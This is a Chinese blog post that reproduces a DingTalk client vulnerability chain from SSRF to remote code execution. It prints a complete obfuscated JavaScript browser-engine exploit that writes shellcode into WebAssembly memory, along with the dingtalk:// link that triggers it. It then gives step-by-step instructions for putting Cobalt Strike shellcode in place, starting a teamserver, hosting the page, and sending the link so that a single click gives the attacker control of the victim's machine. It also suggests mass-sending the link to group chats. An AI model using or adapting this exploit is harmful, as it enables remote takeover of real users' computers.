钉钉从ssrf到rce

前几天爆出来钉钉RCE的漏洞,说一下发现和复现过程

 

0x01 爱之初体验

最开始是发现可以ssrf,当时电脑上就有dingding 然后试了一下

dnslog有回显,可以去访问

 

 

这两个IP一查 都是阿里云的服务器

 

 

payload是这样的,发送到聊天窗口,服务器就会去解析

dingtalk://dingtalkclient/page/link?url=http://....&pc_slide=true

 

0x02 爱之再发现

 

然后奇哥给我说可以rce,找了个payload过来

<html>

<body>
    <h1> test </h1>
    <script>
    var _0x1b17=['KELCi8OxLg==','ZE/CpWvCpDkcPA==','E8Kjw51bQ8O+Klk0w4vCsw==','w5lnw5Ipwr12RsOCw7B/J8OEw4E=','QMOtNcO9w77Dv8OIwp3DmQ7CksOdOA==','X8KgbcK0wqXCuw==','DjfCg8KK','OsO3fsOwwojCq0YpMw==','RMKWBMKHW3PCqcKjTwgMaw==','O8KCw5PCoMOpwo0=','e0rDgMO8wqNndsOM','wphVw6Zhw7wWwrLDg8K1','IibCvsKFwqXCqMKAw6w4NDgs','PcO6Z8O2w4LCp20tMWrDhxMZRSLCmSvDuTjCnk8=','GcOiPsKX','G8K7w6vDpXNGIcOwLnXDu8K9BkI=','w7MXFMKhw78WwpYqwqVVFcKR','GMK/w7vDpnVIJ8Or','ank7Wy4jw44=','HTfCicKbGsKEaysJwqTDux1L','GS3CqsKEwqjCp8KRw5Y=','GcOmcktVwrw=','w50aKsKuwq9cdMO4wpTDqyo5GBQ=','IybCrcKgwrvCpsKGw5w8Pyc5AcOn','NhbCuwM=','wqFcbEfDmMOMw6LCkl9ywqwDwocc','wqfChMOfw4jDjsKzwozCn8Oqwok=','w4tcwrED','cCvCsMOQw7g=','w6pdw4k=','wqJyw4vCmMO1wrTCj8OSwqnDnSY=','WsKcBA==','wrV8w4vCjcOlwrDDgcKXwqTDlQ==','XsKWD8KeWA==','H8O+KcKHHGPDiUQ=','w73Ci8OFw60=','Wy7Csg==','e0TDocOvwrR6IsKLQArDsw==','AzvCjQIS','VMOxw6/Ciw==','fEDDp8OdwrhgbMKYGw==','PCzCvg==','w5QHwrPDlGRLNQHDpHwqa8OJR3hiwpwyMBJzJR8=','ZMO8ecOcd8Oow7M6wq1O','w417wqvDl3BuwooiwrnCpDBZwoNw','fHtRGA==','Y24s','w4VWwrsdKQ8=','HsKCOC4RwrQ=','w4AJwrLDi05SLxfDtEI0esODaA==','L2kiFG0=','H8O+I8KdBmc=','w6RcwrEPMQI=','FTvDq8O+w7Ucax4=','FsKfJS4Rwrky','wpBAw5zCjMO1','HsO+w4PDgsKUWw==','EcKxwoXDjcOLCQ==','PkrCncOEOMOww7fCrlDCgMOJesOdAQ==','F8K+w49bSQ==','w4dew5rDmMKg','wp52wrbCpzM=','wqIjw4xDwqA=','cMKIw5vCncKdJV/CoMK7RA==','CiTCnsKdC8KV','fXtHE8ObSBZqwp5G','Fjd1EMOqw57CgcOd','ZsOje8OLbMO8w4Q3wqAQwqU=','C8Kxw63Dh3RZIcO6Pj4=','w4rDj8O/','ZU/Ctg==','BcKyw55TcsO8HF8+w7jCtsKtEgo7w5LCigQ8','w4ZdwrkVPAM='];(function(_0x4285cf,_0x1b1736){var _0x1368bb=function(_0x5a17b5){while(--_0x5a17b5){_0x4285cf['push'](_0x4285cf['shift']());}};_0x1368bb(++_0x1b1736);}(_0x1b17,0x17b));var _0x1368=function(_0x4285cf,_0x1b1736){_0x4285cf=_0x4285cf-0x0;var _0x1368bb=_0x1b17[_0x4285cf];if(_0x1368['kUYGYC']===undefined){(function(){var _0x270725=function(){var _0x2929b1;try{_0x2929b1=Function('return\x20(function()\x20'+'{}.constructor(\x22return\x20this\x22)(\x20)'+');')();}catch(_0x1b9f87){_0x2929b1=window;}return _0x2929b1;};var _0x1971fd=_0x270725();var _0x3ad59d='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x1971fd['atob']||(_0x1971fd['atob']=function(_0x332690){var _0x352a1c=String(_0x332690)['replace'](/=+$/,'');var _0x194774='';for(var _0x5d479b=0x0,_0xde7a28,_0x1ef172,_0x26c98e=0x0;_0x1ef172=_0x352a1c['charAt'](_0x26c98e++);~_0x1ef172&&(_0xde7a28=_0x5d479b%0x4?_0xde7a28*0x40+_0x1ef172:_0x1ef172,_0x5d479b++%0x4)?_0x194774+=String['fromCharCode'](0xff&_0xde7a28>>(-0x2*_0x5d479b&0x6)):0x0){_0x1ef172=_0x3ad59d['indexOf'](_0x1ef172);}return _0x194774;});}());var _0xa07d5c=function(_0x5c13fe,_0x1ca04c){var _0x48ea63=[],_0x8f6b18=0x0,_0x30c8e4,_0xb17e6='',_0x53b898='';_0x5c13fe=atob(_0x5c13fe);for(var _0x52b8af=0x0,_0x1cd1ff=_0x5c13fe['length'];_0x52b8af<_0x1cd1ff;_0x52b8af++){_0x53b898+='%'+('00'+_0x5c13fe['charCodeAt'](_0x52b8af)['toString'](0x10))['slice'](-0x2);}_0x5c13fe=decodeURIComponent(_0x53b898);var _0x49825d;for(_0x49825d=0x0;_0x49825d<0x100;_0x49825d++){_0x48ea63[_0x49825d]=_0x49825d;}for(_0x49825d=0x0;_0x49825d<0x100;_0x49825d++){_0x8f6b18=(_0x8f6b18+_0x48ea63[_0x49825d]+_0x1ca04c['charCodeAt'](_0x49825d%_0x1ca04c['length']))%0x100;_0x30c8e4=_0x48ea63[_0x49825d];_0x48ea63[_0x49825d]=_0x48ea63[_0x8f6b18];_0x48ea63[_0x8f6b18]=_0x30c8e4;}_0x49825d=0x0;_0x8f6b18=0x0;for(var _0x17f739=0x0;_0x17f739<_0x5c13fe['length'];_0x17f739++){_0x49825d=(_0x49825d+0x1)%0x100;_0x8f6b18=(_0x8f6b18+_0x48ea63[_0x49825d])%0x100;_0x30c8e4=_0x48ea63[_0x49825d];_0x48ea63[_0x49825d]=_0x48ea63[_0x8f6b18];_0x48ea63[_0x8f6b18]=_0x30c8e4;_0xb17e6+=String['fromCharCode'](_0x5c13fe['charCodeAt'](_0x17f739)^_0x48ea63[(_0x48ea63[_0x49825d]+_0x48ea63[_0x8f6b18])%0x100]);}return _0xb17e6;};_0x1368['SGqjCq']=_0xa07d5c;_0x1368['PalevQ']={};_0x1368['kUYGYC']=!![];}var _0x5a17b5=_0x1368['PalevQ'][_0x4285cf];if(_0x5a17b5===undefined){if(_0x1368['FXcKZO']===undefined){_0x1368['FXcKZO']=!![];}_0x1368bb=_0x1368['SGqjCq'](_0x1368bb,_0x1b1736);_0x1368['PalevQ'][_0x4285cf]=_0x1368bb;}else{_0x1368bb=_0x5a17b5;}return _0x1368bb;};const max_size=0x2710;const buf=new ArrayBuffer(0x8);const f64=new Float64Array(buf);const u32=new Uint32Array(buf);function f2i(_0x5ba462){f64[0x0]=_0x5ba462;let _0x3b54a5=Array['from'](u32);return _0x3b54a5[0x1]*0x100000000+_0x3b54a5[0x0];}function i2f(_0x2f58b4){let _0x8b3c4c=[];_0x8b3c4c[0x0]=parseInt(_0x2f58b4%0x100000000);_0x8b3c4c[0x1]=parseInt((_0x2f58b4-_0x8b3c4c[0x0])/0x100000000);u32[_0x1368('0x38','XQdw')](_0x8b3c4c);return f64[0x0];}function d2u(_0x9ff56e){f64[0x0]=_0x9ff56e;let _0x47fd50=Array[_0x1368('0xa','7rtu')](u32);return _0x47fd50;}function u2d(_0x535342,_0x2feac9){u32[0x0]=_0x535342;u32[0x1]=_0x2feac9;return f64[0x0];}function print(_0x510c7e){document[_0x1368('0x29','1027')](_0x1368('0x16','pndm')+_0x510c7e+_0x1368('0x19','@XkD'));}function hex(_0x2abe47){return _0x2abe47[_0x1368('0x45','Ob1V')](0x10)[_0x1368('0x3','@XkD')](0x10,'0');}function success_value(_0x140a70,_0x2c5308){console[_0x1368('0x11','THAJ')](_0x1368('0x15','ki5k')+_0x140a70+hex(_0x2c5308));}function wasm_func(){var _0x1ab208={'env':{'puts':function _0x36676a(_0x4b8a69){console[_0x1368('0x1b','*I%3')](_0x4b8a69);}}};var _0x364582=new Uint8Array([0x0,0x61,0x73,0x6d,0x1,0x0,0x0,0x0,0x1,0x89,0x80,0x80,0x80,0x0,0x2,0x60,0x1,0x7f,0x1,0x7f,0x60,0x0,0x0,0x2,0x8c,0x80,0x80,0x80,0x0,0x1,0x3,0x65,0x6e,0x76,0x4,0x70,0x75,0x74,0x73,0x0,0x0,0x3,0x82,0x80,0x80,0x80,0x0,0x1,0x1,0x4,0x84,0x80,0x80,0x80,0x0,0x1,0x70,0x0,0x0,0x5,0x83,0x80,0x80,0x80,0x0,0x1,0x0,0x1,0x6,0x81,0x80,0x80,0x80,0x0,0x0,0x7,0x92,0x80,0x80,0x80,0x0,0x2,0x6,0x6d,0x65,0x6d,0x6f,0x72,0x79,0x2,0x0,0x5,0x68,0x65,0x6c,0x6c,0x6f,0x0,0x1,0xa,0x8d,0x80,0x80,0x80,0x0,0x1,0x87,0x80,0x80,0x80,0x0,0x0,0x41,0x10,0x10,0x0,0x1a,0xb,0xb,0x92,0x80,0x80,0x80,0x0,0x1,0x0,0x41,0x10,0xb,0xc,0x48,0x65,0x6c,0x6c,0x6f,0x20,0x57,0x6f,0x72,0x6c,0x64,0x0]);let _0x17d97a=new WebAssembly[(_0x1368('0x6','*I%3'))](new WebAssembly[(_0x1368('0x26','h0rH'))](_0x364582),_0x1ab208);let _0x4137b4=new Uint8Array(_0x17d97a[_0x1368('0x28','U7m4')][_0x1368('0x22','U7m4')][_0x1368('0x2a','CQJJ')]);return _0x17d97a[_0x1368('0x4','qxzt')][_0x1368('0x13','THAJ')];}func=wasm_func();function gc(){for(let _0x636073=0x0;_0x636073<0x10;_0x636073++){new Array(0x1000000);}}function debug(){for(let _0x1aae5c=0x0;_0x1aae5c<0x10000;_0x1aae5c++){for(let _0x206767=0x0;_0x206767<0x20000;_0x206767++){var _0x4e0be5=_0x4e0be5+_0x1aae5c+_0x206767;}}}global_object={};setPropertyViaEmbed=(_0x704953,_0xabb024,_0x54136d)=>{const _0x57fb88=document[_0x1368('0x5','qlp^')](_0x1368('0x3b','e8CW'));_0x57fb88[_0x1368('0x3a','h0rH')]=_0x54136d;_0x57fb88['type']=_0x1368('0x46','E5A6');Object['setPrototypeOf'](global_object,_0x57fb88);document[_0x1368('0x1f','4nv[')][_0x1368('0x35','ow9l')](_0x57fb88);_0x704953[_0x1368('0x23','p]KF')]=_0xabb024;_0x57fb88[_0x1368('0x25','QvKY')]();};createCorruptedPair=(_0x16735d,_0x65366a)=>{const _0x5a7565={'__proto__':global_object};_0x5a7565[_0x1368('0x47','*I%3')]=0x1;setPropertyViaEmbed(_0x5a7565,_0x65366a,()=>{Object[_0x1368('0x2c','e8CW')](global_object,null);_0x5a7565[_0x1368('0x8','Ub)S')]=_0x16735d;});const _0x2dc8d4={'__proto__':global_object};_0x2dc8d4[_0x1368('0x43','THAJ')]=0x1;setPropertyViaEmbed(_0x2dc8d4,_0x65366a,()=>{Object[_0x1368('0x1','@XkD')](global_object,null);_0x2dc8d4[_0x1368('0xb','*j!$')]=_0x16735d;_0x5a7565[_0x1368('0x2','5I39')]=1.1;});return[_0x5a7565,_0x2dc8d4];};const array=[5.5,1.1];array['prop']=0x1;const test1=new BigUint64Array(0x2);var oob_array=[1.1,2.2,3.3];obj_array={'m':0x539,'target':gc};ab=new ArrayBuffer(0x1337);gc();gc();gc();var test=[oob_array,oob_array,oob_array,oob_array,oob_array];test[_0x1368('0x41','qlp^')]=0x1;const [object_1,object_2]=createCorruptedPair(array,test);jit=(_0x166e60,_0x539576,_0x1ae253)=>{return _0x166e60['corrupted_prop'][_0x539576];};for(var i=0x0;i<0x10000;++i)jit(object_1,0x0);var leak=jit(object_2,0x0);elem=d2u(leak)[0x0];print('0x'+hex(elem));const num=u2d(elem+0x4,elem+0x4);const num2=u2d(elem,elem);proto2={};setPropertyViaEmbed2=(_0x3c4ce8,_0x5b3f78,_0x570b6e)=>{const _0x1411bc=document[_0x1368('0x3e','NbDf')](_0x1368('0x2d','54b8'));_0x1411bc[_0x1368('0x44','MqJl')]=_0x570b6e;_0x1411bc[_0x1368('0x0','QvKY')]=_0x1368('0x42','Xp#V');Object[_0x1368('0x1e','djTM')](proto2,_0x1411bc);document[_0x1368('0xd','h0rH')][_0x1368('0x3d','54b8')](_0x1411bc);_0x3c4ce8[_0x1368('0x33','4nv[')]=_0x5b3f78;_0x1411bc['remove']();};createCorruptedPair2=(_0x31208b,_0x4b08b5)=>{const _0x2fdefd={'__proto__':proto2};_0x2fdefd[_0x1368('0x27','pndm')]=0x1;setPropertyViaEmbed2(_0x2fdefd,_0x4b08b5,()=>{Object['setPrototypeOf'](proto2,null);_0x2fdefd[_0x1368('0x36','@XkD')]=_0x31208b;});const _0x5a6d27={'__proto__':proto2};_0x5a6d27[_0x1368('0x3c','XQdw')]=0x1;setPropertyViaEmbed2(_0x5a6d27,_0x4b08b5,()=>{Object[_0x1368('0x9','*I%3')](proto2,null);_0x5a6d27[_0x1368('0xc','eHuP')]=_0x31208b;_0x2fdefd[_0x1368('0x14','QvKY')]=1.1;});return[_0x2fdefd,_0x5a6d27];};const [object_3,object_4]=createCorruptedPair2(array,num2);jit22=(_0x15b278,_0x32c377)=>{_0x15b278[_0x1368('0x31','*clI')][_0x32c377]=num2;_0x15b278[_0x1368('0x12','1#r2')][_0x32c377+0x1]=1.1;return _0x15b278[_0x1368('0x1d','ow9l')][_0x32c377];};for(var i=0x0;i<0x100000;++i)jit22(object_3,0x0);var leak2=jit22(object_4,0x0);var object_idx=undefined;var object_idx_flag=undefined;for(let i=0x0;i<max_size;i++){if(d2u(oob_array[i])[0x0]==0xa72){print(_0x1368('0x2b','CQJJ')+i+_0x1368('0x18','O6t]'));print('target:\x20i:\x20'+i+'\x20hi\x201');object_idx=i;object_idx_flag=0x1;break;}if(d2u(oob_array[i])[0x1]==0xa72){print(_0x1368('0x7','3nrn')+i+_0x1368('0x2f','djTM'));print('target:\x20i:\x20'+(i+0x1)+_0x1368('0x18','O6t]'));object_idx=i+0x1;object_idx_flag=0x0;break;}}function addrof(_0x71fee0){obj_array[_0x1368('0x32','qlp^')]=_0x71fee0;return d2u(oob_array[object_idx])[object_idx_flag]-0x1;}var ab_addr=addrof(ab);print('test:\x20'+hex(ab_addr));var bk_idx=undefined;var bk_idx_flag=undefined;let flag=0x0;for(let i=0x0;i<max_size;i++){if(d2u(oob_array[i])[0x0]==0x1337){console[_0x1368('0x20','qxzt')](_0x1368('0x40','M*(X')+i+_0x1368('0x2e','1027'));console[_0x1368('0x37','ki5k')](_0x1368('0x17','Ob1V')+i+_0x1368('0xe','*I%3'));bk_idx=i;bk_idx_flag=0x1;break;}if(d2u(oob_array[i])[0x1]==0x1337){console['log']('m:\x20i:\x20'+i+_0x1368('0x24','qxzt'));console[_0x1368('0xf','0$K8')](_0x1368('0x10','1#r2')+(i+0x1)+_0x1368('0x30','roPh'));bk_idx=i+0x1;bk_idx_flag=0x0;break;}}var dv=new DataView(ab);var bk_addr=d2u(oob_array[bk_idx]);function get_32(_0x251c0e){var _0x524bc3=d2u(oob_array[bk_idx]);if(bk_idx_flag==0x0){oob_array[bk_idx]=u2d(_0x251c0e,_0x524bc3[0x1]);}else{oob_array[bk_idx]=u2d(_0x524bc3[0x0],_0x251c0e);}return dv['getUint32'](0x0,!![]);}function set_32(_0x2f8305,_0x1a3c26){var _0xd022f7=d2u(oob_array[bk_idx]);if(bk_idx_flag==0x0){oob_array[bk_idx]=u2d(_0x2f8305,_0xd022f7[0x1]);}else{oob_array[bk_idx]=u2d(_0xd022f7[0x0],_0x2f8305);}dv[_0x1368('0x1a','Ob1V')](0x0,_0x1a3c26,!![]);}function set_8(_0x5d0cd7,_0x575a5c){var _0x50493b=d2u(oob_array[bk_idx]);if(bk_idx_flag==0x0){oob_array[bk_idx]=u2d(_0x5d0cd7,_0x50493b[0x1]);}else{oob_array[bk_idx]=u2d(_0x50493b[0x0],_0x5d0cd7);}dv[_0x1368('0x34','tZnn')](0x0,_0x575a5c,!![]);}var wasm_func_addr=addrof(func);print(_0x1368('0x39','54b8')+hex(wasm_func_addr));var shared_info_addr=get_32(wasm_func_addr+0xc)-0x1;print(_0x1368('0x48','Xp#V')+hex(shared_info_addr));var export_function_data_addr=get_32(shared_info_addr+0x4)-0x1;print('export_function_data_addr\x20is:\x20'+hex(export_function_data_addr));var wasm_instance_addr=get_32(export_function_data_addr+0x8)-0x1;print(_0x1368('0x1c','p]KF')+hex(wasm_instance_addr));var rwx_addr=get_32(wasm_instance_addr+0x40);print(_0x1368('0x3f','M*(X')+hex(rwx_addr));var shellcode=new Uint8Array([0x89,0xe5,0x83,0xec,0x20,0x31,0xdb,0x64,0x8b,0x5b,0x30,0x8b,0x5b,0xc,0x8b,0x5b,0x1c,0x8b,0x1b,0x8b,0x1b,0x8b,0x43,0x8,0x89,0x45,0xfc,0x8b,0x58,0x3c,0x1,0xc3,0x8b,0x5b,0x78,0x1,0xc3,0x8b,0x7b,0x20,0x1,0xc7,0x89,0x7d,0xf8,0x8b,0x4b,0x24,0x1,0xc1,0x89,0x4d,0xf4,0x8b,0x53,0x1c,0x1,0xc2,0x89,0x55,0xf0,0x8b,0x53,0x14,0x89,0x55,0xec,0xeb,0x32,0x31,0xc0,0x8b,0x55,0xec,0x8b,0x7d,0xf8,0x8b,0x75,0x18,0x31,0xc9,0xfc,0x8b,0x3c,0x87,0x3,0x7d,0xfc,0x66,0x83,0xc1,0x8,0xf3,0xa6,0x74,0x5,0x40,0x39,0xd0,0x72,0xe4,0x8b,0x4d,0xf4,0x8b,0x55,0xf0,0x66,0x8b,0x4,0x41,0x8b,0x4,0x82,0x3,0x45,0xfc,0xc3,0xba,0x78,0x78,0x65,0x63,0xc1,0xea,0x8,0x52,0x68,0x57,0x69,0x6e,0x45,0x89,0x65,0x18,0xe8,0xb8,0xff,0xff,0xff,0x31,0xc9,0x51,0x68,0x2e,0x65,0x78,0x65,0x68,0x63,0x61,0x6c,0x63,0x89,0xe3,0x41,0x51,0x53,0xff,0xd0,0x31,0xc9,0xb9,0x1,0x65,0x73,0x73,0xc1,0xe9,0x8,0x51,0x68,0x50,0x72,0x6f,0x63,0x68,0x45,0x78,0x69,0x74,0x89,0x65,0x18,0xe8,0x87,0xff,0xff,0xff,0x31,0xd2,0x52,0xff,0xd0]);for(let i=0x0;i<shellcode[_0x1368('0x21','h0rH')];i++)set_8(rwx_addr+i,shellcode[i]);func();
</script>
</body>

 

 

代码的原理不是很懂,太菜了,只知道把其中的shellcode 换成cs生成的木马,就可以上线了。

 

 

简单记录下上线过程:

首先在VPS上启动cs,这里命令是

 ./teamserver IP passwd

 

然后登上cs,生成shellcode

 

 

 

 

 

 

生成c文件后,按照给的payload 我们把\x的16进制给替换成0x的

因为这里的给的shellcode就是0x格式

\x连起来表示字符串,0x单表整型数字

比如这个0x42对应16进制数为62,而\x对应ASCII码 66为B

 当然ASCII从0~127就没咯所以 \x7f对应127正好是

 

 

 

 

 

 

 

 所以格式是0x要用 ','逗号分隔,而\x直接连接

 

 

 

替换一下就行

 

 

 

然后把改好的shellcode 替换到payload上面

 

 

 

 

 

接下来用VPS python3简单启动一个web页面 用的是9127端口

python3 -m http.server 9127

 

下面的是访问日志

 

 

 

 

 

然后构造好页面成http

dingtalk://dingtalkclient/page/link?url=http://IP:PORT/jjj.html&pc_slide=true

 

然后这里自己点击

 

 

 

 

 

结果啥也没有,cao !! 后面重写了好几次shellcode,换成弹计算器也不行,

最后发现我是6.3.15版本,这个版本好像是不行的,虽然能ssrf响应dnslog,但是不能rce

 

 

然后换成了6.3.5版本

 

 

 

最后终于成功上线了,可以看到process是通过钉钉的

 

 

 

 

 

 

0x03 爱后再总结

 

这种类型的rce危害确实大,如果用的是6.3.5版本的钉钉,那么发送这个链接,只要别人点击就会上线。

群发到学校群或者工作群直接批量上线,危害极大。

所以今天早上我打开钉钉自动给我从15更新到了25版本,而且我还不知道!!

 这个漏洞利用方式和去年护网爆出的google chrome的那个0day很类似,

可以看看朋友的博客有验证过程

 

漏洞验证或者利用 一定要先注意到版本适用问题,这次就因为这个 被搞了半天。

 

给一个RCE的视频链接

 

posted @ 2022-02-17 10:18  Erichas  阅读(559)  评论(2编辑  收藏  举报